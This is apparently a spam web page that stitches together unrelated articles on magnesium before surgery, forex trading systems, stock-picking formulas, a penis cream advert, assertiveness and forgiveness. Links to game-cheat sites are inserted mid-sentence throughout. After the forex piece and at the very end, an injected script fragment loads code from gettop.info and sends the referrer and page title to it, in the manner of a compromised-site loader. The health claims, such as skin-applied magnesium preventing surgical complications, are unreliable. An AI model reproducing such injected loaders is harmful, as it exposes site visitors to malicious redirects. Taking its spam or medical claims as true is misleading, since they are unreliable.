Having surgery? Increase your magnesium levels

If you more information are scheduled for surgery, it is in your best interest to start increasing your magnesium stores as soon as possible. All types of surgery decrease this mineral and this leads to a variety of complications including blood clots, abnormal heart rhythms, kidney failure, impaired brain function, strokes and even death. Magnesium plays such an important role in ensuring a patient’s survival that some doctors in Japan will not operate unless levels have been corrected (1).
Orthopedic and abdominal surgery deplete magnesium (2), but the drop is greater and lasts even longer after cardiac surgery (3,4,5). In fact, magnesium levels can decrease by a massive 52% with only a 5% improvement 24 hours later (6). This occurs in both adults and children and can result in serious neurological and cardiac problems, including abnormal heart rhythms (7,8,9). Atrial fibrillation (a common rhythm disorder), is decreased with magnesium supplementation (10,11).
“We recommend routine measurement of magnesium levels after CPB (cardiopulmonary bypass) in pediatric patients undergoing heart surgery, with timely magnesium supplementation in the postoperative period.” – Dr. B. Hugh Dorman, et al
“Stress” hormones, epinephrine and norepinephrine, stimulate the sympathetic nervous system, increasing blood pressure and accelerating the heart rate (12). Levels of these hormones are elevated after surgery but to an even greater extent when magnesium is not supplemented beforehand (13). Researchers have concluded that this mineral reduces the risk of complications arising during and after surgery.
“Magnesium administration is safe and improves short-term
postoperative neurologic function after cardiac surgery,
particularly in preserving short-term memory and
cortical control over brainstem functions.” – Dr. Sunil K. Bhudia (14).
The risk of developing or dying from a blood clot after surgery is high, and more information can last for up to 3 months (15). Magnesium has an anti-thrombotic effect and is a safe, natural way to thin the blood (16,17). In addition, it has been shown to improve hemodynamics (the movement of blood) in patients undergoing heart surgery (18) and decrease the need for painkillers in the post-operative period (19). Given intravenously, it decreases anaesthetic consumption (20) and prevents seizures in pregnant women with toxemia (21).
“It is the surgeon’s primary responsibility to make sure not only that the surgery is effective, but also to make sure that the complication rate of surgery is minimized as much as possible.” – Dr. Alexander Cohen, honorary consultant vascular physician at King’s College Hospital in London.
If you are going under the knife, cut down on caffeine, sugar, alcohol and smoking as these factors all deplete magnesium. The easiest, fastest way to increase levels of this essential mineral is through transdermal application (to the skin). Not only will it help prevent the numerous complications that may occur during and after surgery, but it will also accelerate healing and improve general wellbeing in the post-operative phase.

Forex Trading Robots Vs Manual Trading Which Is Best

Forex Trading here Robots Vs Manual Trading Which Is Best?

Should you buy a forex robot and trust it to lead you to currency trading success or should you learn forex trading yourself and trade manually? Which is more likely to lead you to currency trading success?

Consider this question:

If forex robots make as much as they claim why don’t banks and brokerages sack their fund managers and dealers and use robots?

Think about it – most of the forex trading robots you see claim to make as much, if not more than the best bank dealers, yet only cost a few hundred bucks.

So why don’t the banks and brokerages sack their dealing teams that cost them far more? You could ask yourself as well – why bother working, when you can just sit at home, put your feet up and your robot goes to work for you?

The answer is of course the forex trading robots you see online won’t make you money long term. Why? Well consider this, all the track records you see are made up in hindsight and simulated, there NOT real trading. Here is the typical disclaimer you will see:

“CFTC RULE 4.41 – Hypothetical or simulated performance results have certain limitations. Unlike an actual performance record, simulated results do not represent actual trading. Also, since the trades have not mobile strike hack tool been executed, the results may have under-or-over compensated for the impact, if any, of certain market factors, such as lack of liquidity. Simulated trading programs in general are also subject to the fact that they are designed with the benefit of hindsight. No representation is being made that any account will or is likely to achieve profit or losses similar to those shown”.

Think a track record with the above printed on it will make you money? Well try it and see!

These automated trading systems are designed to appeal to the greedy or naive investor and they really should know better – making money in any venture is not easy.

There is one advantage you have over any robot – you are capable of independent thought, no computer can think for itself and your brain is an here amazing tool – if you use it correctly.

The rewards with manual trading are huge and you need to work smart and get a set of trading rules, to execute your trading system and have the discipline to follow it.

Forex trading offers huge rewards for the effort you need to put in and anyone can learn to trade – it’s just a question of having the right mindset and right forex education.

Today, we marvel at computers and how they have enriched our lives – but in forex trading the appliance of science is not enough, as markets don’t move to set formula’s, there an odds game. However, if you learn how to trade www.8ballpoolhackcheat.com/ the odds you can win.

So which is best using a forex robot or manual trading?

You know our view its manual trading although we have seen some robots that can make money (they are either expensive or require tremendous discipline) you can make more if you apply yourself correctly.

Forex trading is a challenge and one you win just keep in mind you can win have confidence in your ability and learn currency trading for long term gains and don’t trust anyone else – especially not a forex trading system with a simulated track record!

Forex Trading System 147% Average Profit Over 10 Years!

Forex Trading System – 147% Average Profit Over 10 Years!

I bought a forex trading system which claimed the above a few years back and it claimed the above. So how good was it? Let’s take a look.

The system was based upon artificial intelligence and actually claimed to be able to think for itself and was devised by a really bright guy a NASA engineer. I was really impressed and decided to give it a go.

The first week it made 20% then over the next 5 weeks it wiped out the entire account and there is a lesson here for anyone thinking of buying a forex trading system.

The lesson is – check the disclaimer closely on the track record, mine had the one below which, you will see on just about every system sold online, here it is:

“CFTC RULE 4.41 – Hypothetical or simulated performance results have certain limitations. Unlike an actual performance record, simulated results do not represent actual trading. Also, visit our website since the trades have not been executed, the results may have under-or-over compensated for the impact, if any, of certain market factors, such as lack of liquidity. Simulated trading programs in general are also subject to the fact that they are designed with the benefit of hindsight. No representation is being made that any account http://www.shadowfight2hackcheat.com/shadowfight2hack/ will or is likely to achieve profit or losses similar to those shown”.

When I read it now I can’t believe how dumb I was. The share this website system had never been traded for real, just in hindsight and of course that’s easy. I was simply impressed with the vendor, he was a nice and very bright guy – but he had simply build a clever system and curve fitted it and that means equity wipeout.

He created rule after rule and bent the system to make a profit on the data.

The problem of course is no two pieces of data ever replicate themselves exactly and the system failed.

This is called curve fitting. A trader I know once likened this to shooting at a barn door than drawing a chalk circle around everyone – AFTER the shots had been fired, to make them all look like bulls-eyes.

Today nothing has changed, most system vendors promote a system based upon a simulated track record which has been curve fitted and is destined to fail.

My advice is if you are buying a forex trading system, is you see a simulation, be wary and either discount it and move on, or see if the system has been curve fitted.

Clues to a curve fitted system www.8ballpoolhackcheat.com/ are:

– Lots of rules and parameters

– Unique rules for different markets

– Unique rules for different trading conditions

– Subjectivity on trading signals to override rules

Generally, you’re best of with a simple system which has few elements top break in real time trading and the comfort of a real time track record with audited statements over at least 3 years.

Be careful when you choose a forex trading system and always look for curve fitting before buying.} else {

Four Magic Investment Formulas

Four Magic Investment Formulas

One question almost every investor asks at some point is whether it is possible to achieve above market returns by selecting a diversified group of stocks according to some formula, rather than having to evaluate each stock from every angle. There are obvious advantages to such a formulaic approach. For the individual, the amount of time and effort spent caring for his investments would be reduced, leaving more time for him to spend on more enjoyable and fulfilling tasks. For the institution, large sums of money could be deployed without having to rely upon the investing acumen of a single talented stock picker. Many of the proposed systems also offer the advantage of matching the inflow of investable funds with investment opportunities. An investor who follows no formula, and evaluates each stock from every angle, may often find himself holding cash. Historically, this has been a problem for some excellent stock pickers. So, there are real advantages to favoring a formulaic approach to investing if such an approach would yield returns similar to the returns a complete stock by stock analysis would yield.

Many investment writers have proposed at least one such formulaic approach during their lifetime. The most promising formulaic approaches have been articulated by three men: Benjamin Graham, David Dreman, and Joel Greenblatt. As each of these approaches appeals to logic and common sense, they are not unique to these three men. But, these are the three names with which these approaches are usually most closely associated; so, there is little need to draw upon sources beyond theirs.

Benjamin Graham wrote three books of consequence: “Security Analysis”, click this website “The Intelligent Investor”, and “The Interpretation of Financial Statements”. Within each book, he hints at various workable approaches both in stocks and bonds; however, he is most explicit in his best known work, “The Intelligent Investor”. There, Graham discusses the purchase of shares for less than two – thirds of their net current asset value. http://www.8ballpoolhackcheat.com/ The belief that this method would yield above market returns is supported on both empirical and logical grounds. In fact, it currently enjoys far too much support to be practicable. Public companies rarely trade below their net current asset values. This is unlikely to change in the future. Buyout firms, unconventional money managers, and vulture investors now check such excessive bouts of public pessimism by taking large or controlling stakes in troubled companies. As a result, the investing public is less likely to indulge its pessimism as feverishly as it once did; for, many cheap stocks now have the silver lining of being takeover targets. As Graham’s net current asset value method is neither workable at present, nor is likely to prove workable in the future, we must set it aside.

David Dreman is known as a contrarian investor. In his case, it is an appropriate label, because of his keen interest in behavioral finance. However, in most cases the line separating the value investor from the contrarian investor is fuzzy at best. Dreman’s contrarian investing strategies are derived from three measures: price to earnings, price to cash flow, and price to book value. Of these measures, the price to earnings ratio is by far the most conspicuous. It is quoted nearly everywhere the share price is quoted. When inverted, the price to earnings ratio becomes the earnings yield. To put this another way, a stock’s earnings yield is “e” over “p”. Dreman describes the strategy of buying stocks visit our website trading at low prices relative to their earnings as the low P/E approach; but, he could have just as easily called it the high earnings yield approach. Whatever you call it, this approach has proved effective in the past. A diversified group of low P/E stocks has usually outperformed both a diversified group of high P/E stocks and the market as a whole.

This fact suggests that investors have a very hard time quantifying the future prospects of most public companies. While they may be able to make correct qualitative comparisons between businesses, they have trouble assigning a price to these qualitative differences. This does not come as a surprise to anyone with much knowledge of human judgment (and misjudgment). I am sure there is some technical term for this deficiency, but I know it only as “checklist syndrome”. Within any mental model, one must both describe the variables and assign weights to these variables. Humans tend to have little difficulty describing the variables – that is, creating the checklist. However, they rarely have any clue as to the weight that ought to be given to each variable. This is why you will sometimes hear analysts say something like: the factor that tipped the balance in favor of online sales this holiday season was high gas prices (yes, this is an actual paraphrase; but, I won’t attribute it, because publicly attaching such an inane argument to anyone’s name is just cruel). It is true that avoiding paying high prices at the pump is a possible motivating factor in a shopper’s decision to make online Christmas purchases. However, it is an immaterial factor. It is a mere pebble on the scales. This is the same kind of thinking that places far too much value on a stock’s future earnings growth and far too little value on a stock’s current earnings.

The other two contrarian methods: the low price to cash flow approach and the low price to book value approach work for the same reasons. They exploit the natural human tendency to see a false equality in the factors, and to run down a checklist. For instance, a stock that has a triple digit price to cash flow ratio, but is in all other respects an extraordinary business, will be judged favorably by a checklist approach. However, if great weight is assigned to present cash flows relative to the stock price, the stock will be judged unfavorably. This also illustrates the second strength of the three contrarian methods. They heavily weight the known factors. Of course, they do not heavily weight all known factors. They only consider three easily quantifiable known factors. An excellent brand, a growing industry, a superb management team, etc. may also be known factors. However, they are not precisely quantifiable. I would argue that while these factors may not be quantifiable they are calculable; that is to say, while no exact value may be assigned to them, they are useful data that ought to be considered when evaluating an investment.

There is the possibility of a middle ground here. These three contrarian methods may be used as a screen. Then, the investor may apply his own active judgment to winnow the qualifying stocks down to a final portfolio. Personally, I do not believe this is an acceptable compromise. These three methods do not adequately model the diversity of great investments. Therefore, they must either exclude some of the best stocks or include too many of the worst stocks. It is wise to place great weight upon each of these measures; however, it is foolish disqualify any stock because of a single criterion (which is exactly what such a screen does).

Finally, there is Joel Greenblatt’s “magic formula”. This is the most interesting formulaic approach to investing, both because it does not subject stocks to any true/false tests and because it is a composite of the two most important readily quantifiable measures a stock has: earnings yield and return on capital. As you will recall, earnings yield is simply the inverse of the P/E ratio; so, a stock with a high earnings yield is simply a low P/E stock. Return on capital may be thought of as the number of pennies earned for each dollar invested in the business. The exact formula that Greenblatt uses is described in “The Little Book That Beats the Market”. However, the formula used is rather unimportant. Over large groups of stocks (which is what Greenblatt suggests the magic formula be used on) any differences between the various return on capital formulae will not have much affect on the performance of the portfolios constructed. Greenblatt claims his magic formula may be used in two different ways: as an automated portfolio love here generation tool or as a screen. For an investor like you (that is, one with sufficient curiosity and commitment to frequent a site such as this) the latter use is the more appropriate one. The magic formula will serve you well as a screen. I would argue, however, that you needn’t limit yourself to stocks screened by the magic formula, if you have full confidence in your judgment regarding some other stock.

These four formulaic approaches (the three from Dreman and the one from Greenblatt) will likely yield returns greater than or equal to the returns you would obtain from an index fund. Therefore, you would do better to invest in your own basket of qualifying stocks than in the prefabricated market basket. If you want to be a passive investor, or believe yourself incapable of being an active investor, these formulaic approaches are your best bet. In fact, if I were approached by an institution making long – term investments and using only a very small percentage of the fund for operating expenses, I would recommend an automated process derived from these four approaches. I would also recommend that 100% of the fund’s investable assets be put into equities, but that is a discussion for another day (in fact, it’s a discussion for Tuesday; my next podcast is devoted to the dangers of diversification). If, however, you believe you have what it takes to be an active investor, and that is truly what you wish to be, then, I would suggest you do not use these approaches for anything more than helping you generate some useful ideas.

If you choose this path, you need to be clear about what being an active investor entails. Read this next part very carefully (it is correct even though it may not appear to be): I have never found a screen that generates more than one buy order per hundred stocks returned. Even after I have narrowed the list of possible stocks down by a cursory review of the industry and the business itself, I have never found a method that can consistently generate more than one buy order per twenty – five annual reports read. Here, I am citing my best past experiences. In my experience, most screens result in less than one buy order per three hundred stocks returned, and I usually read more like fifty to a hundred annual reports per buy order at a minimum. You may choose to invest in far more stocks than I do. Perhaps instead of limiting yourself to your five to twelve best ideas as I do, you might want to put money into your best twenty – five to thirty ideas. Do the math, and you’ll see that is still quite a bit of homework. That’s why remaining a passive investor is the best bet for most people. The time and effort demanded of the active investor is simply too taxing. They have more important, more enjoyable things to do. If that’s true for you, the four formulaic approaches outlined above should guide you to above market returns.

Four Penis Health Cr&37981;e Myths Dispelled ?Get The Facts About The Real-life Benefits

The word “myth” is often used to describe a story that isn’t true. While this word could be used to describe unicorns, the Loch Ness Monster or Bigfoot, it can also be applied to some stories that circulate about penis vitamin cr&37981;es. That’s a shame, as these myths could keep some men from taking advantage of the best penis care options available. This article may help, as it outlines some of the common tall tales that are spread about these products, along with the truth that hides behind the lies. click this website

Myth 1: “Oral Vitamins Work Just as Well.”
The oral preparations sold in pharmacies and health shops have some of the same ingredients found in an intimate lotion. They might be packed with Vitamin C, for example, or they might contain mega-doses of Vitamin E. While it’s true that these particular ingredients are quite helpful for the penis, there are some drawbacks to using oral supplements. Aside from the inconvenience of taking them, the truth is that often, these ingredients are used by other systems in the body before they ever reach the penile tissue. On the other hand, topical formulas are applied directly to the targeted tissue, where they are quickly absorbed; because of this, they can be a better choice for penis health.

Myth 2: “Foods Provide All of the Nutrients a Penis Needs.”
Just as vitamins have a long way to go before they reach the penile tissue ?if they ever do ?nutrients consumed through foods also have to make a long journey, and they are not guaranteed to provide direct benefits to the manhood. In addition, it’s unlikely that men really load up their plates with everything http://www.shadowfight2hackcheat.com/shadowfight2hack/ the penis needs for optimal health. Even men who are conscientious about what they put in their bodies may be missing vital nutrients that are needed to keep the penis healthy, supple and functioning at its prime.

Myth 3: “All these products do is Make Things Smell Nice.”
While some elements in a penis health cr&37981;e do help with odor issues ?vitamin A, for instance, the ingredients in a top-notch penile formula can play an important role in other aspects of penis health, from its appearance to its disease fighting ability to its ability to perform in the bedroom. For example, each dose contains a bit of Vitamin D, which can help skin cells to stay healthy and resist fatigue and disease. Other ingredients are also known to:

?Boost blood flow
?Assist with nerve regeneration
?Enhance sensitivity
?Block wrinkling
?Reduce oxidative damage from free radicals

It’s clear that there’s more going on here than simple odor control, and each dose can bring these powerful benefits to light for almost any man.

Myth 4: “Healthy Guys Don’t Need Help.”
It’s easy to suggest that only the frail and infirm would need click this website the help that a penis health cr&37981;e can provide. After all, guys who have lost sensation due to rough treatment, or men who have chapped and painful skin, often turn to soothing products to restore both health and function. However, these products can also be vital for men who may have no injuries now but who might endure a little damage in the future.

Consider this: The emollient ingredients in a quality product can keep Check our website skin soft and supple, so the penile tissue is less likely to tear or sustain damage on a microscopic level during an episode of rough sex or dry masturbation. Men who get funky with their business may not plan on hurting themselves, but using a penis health cr&37981;e (health professionals recommend Man1 Man Oil) can help protect the penis from injury and help it heal when surface-level damage does occur. That’s why these cr&37981;es are vital for all men, whether they’re dealing with a problem now or hoping to protect themselves for the future.

Forex Trading Systems Thinking Of Buying One Then Look For This

Forex Trading Systems ?Thinking Of Buying One? Then Look For This

I read a lot of material on forex trading systems and the great copy offering me huge profits for $100 or so, sounds great!

Then when I come to buy the system I look for one thing and one thing only to see if it&25263; worth me parting with my money.

Its obvious but most forex system click this website buyers don&25264; think to ask the obvious its:

The real time audited track record from the vendor.

After all if they make claims about how great their system is shouldn&25264; they be trading it and shouldn&25264; they have some proof it makes money?

Of course they should!

In most cases however with forex trading systems all you get is a hypothetical track record at best, or a visit our website load of vague claims without substantiation.

A hypothetical track record means absolutely nothing.

Let&25263; define exactly what this means:

It means the person had all the closing data in hindsight and can simply make the profit and loss whatever they want it to be.

You never see one that loses money.

Let&25263; face it, if we are doing a track record knowing the closing prices anyone can make money as they know what the prices did.

My 10 year old boy can do that!

There are some good forex trading systems out there and the best way to get one that is reputable is to get a trader who puts his money where his mouth is and trades his own system.

Would you take driving lessons from someone who had not driven before?

Of course you wouldn&25264;!

Use the same rule in trading if the vendor doesn&25264; have the confidence to trade his own system why should you?

Don&25264; fall for the hype

Fact is, there are many forex trading systems sold by vendors without track records and they know their systems don&25264; work and that&25263; why they don&25264; trade.

Of course, they make money from greedy and foolish people who fall for the copy.

Vendor wins www.8ballpoolhackcheat.com/ you lose ?Simple.

People will say the fact that a froex trading here system just because it has made money in the past does not mean it will make money in the future and of course this is true, but I Like the fact the person selling at least has shown profit and has the confidence to trade.

My view is never trade a system without a real time track record of at least two years.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Four Keys To Effective Assertion

Four Keys To Effective Assertion

DO YOU HAVE an “assertion hero/ine” – i.e. someone you regard as exceptionally adept at asserting her or his needs, feelings, opinions, and boundaries? Would others name *you* as a world-class asserter?
The American Management Association once defined “assertion” as communicating in a way that others can hear (understand and accept, vs. agree with) you. How does that compare with your definition?
Popular alternatives to assertion are aggression (“I put my needs and worth above yours”) and submission (“I rank my needs and dignity below yours”).
Effective assertion click this website is a vital key to mutually http://www.shadowfight2hackcheat.com/shadowfight2hack/ satisfying relationships and group harmony – yet few people study this essential skill. Even those that DO study it often miss four powerful keys to effectiveness. Can you name them?
FOUR ESSENTIAL KEYS
A “need” is one or more psychological, spiritual, and/or physical discomforts, so we’re all “needy” much of the time. A primary reason all living things (like you) communicate is to fill local needs – reduce our fluctuating discomforts.
One key to effective assertion is your ability to *identify* what you need accurately, via personal awareness. This includes using the learned ability to “dig down” below surface needs (“I need you to stop interrupting me.”) to the primazry needs causing them (“I REALLY need to feel you want to respect me.”)
Another key is evolving and living by a personal Bill of Rights -and according all other adults and kids the same rights. For an example, see
Believing you are a person of equal dignity and worth to any other person – regardless of social role, education, gender, ethnicity, or age -is essential for effective communication and satisfying relationships. That’s why “shame-based” (wounded) survivors of low-nurturance childhoods are often aggressive, submissive, or numb.
The third key is having an “assertion strategy” – i.e. specific steps you follow to assert yourself in various situations. You’ve probably developed a strategy that is so familiar as to be automatic (unconscious). Observe it!
The effectiveness of your strategy can be gauged by how often you (a) get your current primary needs met, (b) in a way that leaves you and others feeling “good enough” about yourselves, each other, and the process between you.
The fourth key is often overlooked in self-help suggestions on
“successful assertion.” It is to calmly EXPECT the other person to “resist” (disagree, deflect, ignore, ridicule, criticize, minimize, etc.) your assertion. Do this with empathy, rather than with resentment or combativeness. Can you do this?
Be prepared to acknowledge each “resistance” with a brief, nonjudgmental, respectful, “empathic listening” statement – also called mirroring, and active or reflective listening.
Then calmly and firmly re-assert with stable eye contact, and be ready for the next resistance. Do this as often as necessary, until (a) you run out of time or patience, (b) the other person finally hears (vs. agrees with) you, or (c) you both shift into win-win problem solving.
An unseen fifth key is keeping your true Self steadily in charge of your personality – but that’s the subject of another article.
Can you imagine trying this assertiveness strategy with key www.8ballpoolhackcheat.com/ adults and kids in your life? If not – why not?
It can be said that awareness, assertion, and empathic listening are required for effective social problem-solving – i.e. filling your and your partner’s primary needs well enough, and feeling good about doing so. Do you agree?
How does this assertion strategy compare with your current habit? Are you willing to try these keys? Could you become someone’s “assertion hero/ine”? Are here the young people in your life learning to assert effectively?

Forgiving How To Do It Gracefully

Forgiving- How To Do It Gracefully

One of the most difficult things we humans have to encounter is to respond to evil with kindness, hatred with love, or compassion with cruelty- forgiving the unforgivable. We can’t help but admire people who are capable of these exalted acts, but when that very thing is required of us personally, it seems inconceivable. Our default reaction seems to be anger, abhorrence, revenge, righteousness, depression, etc. It’s human of course, to feel these default reactions- it’s not easy when you have been cheated by your click this website spouse, slighted by http://www.shadowfight2hackcheat.com/shadowfight2hack/ your mother-in-law, betrayed by a best friend, or bad-mouthed by a co-worker.
But have you ever asked yourself, “Until when am I going to carry thing pain?” Do you know that it takes more energy to hate than to forgive and let go? How to forgive someone who caused you so much pain may be the hardest thing to do, but believe me, no one will benefit from it more than you. Don’t even think that forgiving is condoning or tolerating an appalling act, rather, view it as big favor to more details yourself. It’s time to unburden yourself with resentment and vengeance. Let the Universe take care of those people who have wronged you, the Universe has a way of correcting them. Have faith- for people always get what they deserve.
The best thing that you should do is to heal and take care of yourself, and you should start by forgiving. If you don’t know how to start, here’s how:
1. The more you hate- the more you lose. Keep in mind that while you are burdened by hatred, the other person is out dancing. This means that no amount of your anger rituals can harm the person you abhor the slightest.
2. List down the things you have learned from the bad experience. If you have been cheated by your partner, go to the core of the problem. Find out the “what and why’s” and learn from it. Keep in mind that nothing is futile as long as you have learned from it. If the bad experience helped you become a better and wiser person, then it’s time to consider forgiving.
3. If forgiving is truly difficult- think of your blessings. Take a moment to think and appreciate the good things in your life. From the food on your table, to your health, to your job, to the people who cares for you- be truly grateful for it. Chances are when you realize how fortunate you are; you will hardly have time to carry anymore grudges.
4. Don’t talk about it. Repeating the “unfortunate event” over and over can be draining not only to you, but to people who are listening to you. Its okay to talk about it initially, but don’t make it a habit. Remember, the word forgive literally means, love here “untie” so stop associating yourself with the bad situation by talking about it repeatedly.
5. The most important key in forgiving is to forgive yourself first. Forgiving includes forgiving yourself for making bad choices, for being too trusting, or for whatever you think that contributed to the whole negative situation. Once you have acknowledged this, be compassionate with yourself. Give yourself time to grieve and feel the pain of the experience. Have a healthy form of release. Don’t bottle it up. Take care of your health. Make yourself the priority.
Heed this, forgiving is for you, not for the other person. It is intended to free you from any thing that can harm your mind and spirit. If you feel that you are not ready, it’s fine. People heal in their own time. But before anything else, allow me to share you this thought from Lewis B. Smedes, “To forgive is to set a prisoner free and discover that the prisoner was you.”s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
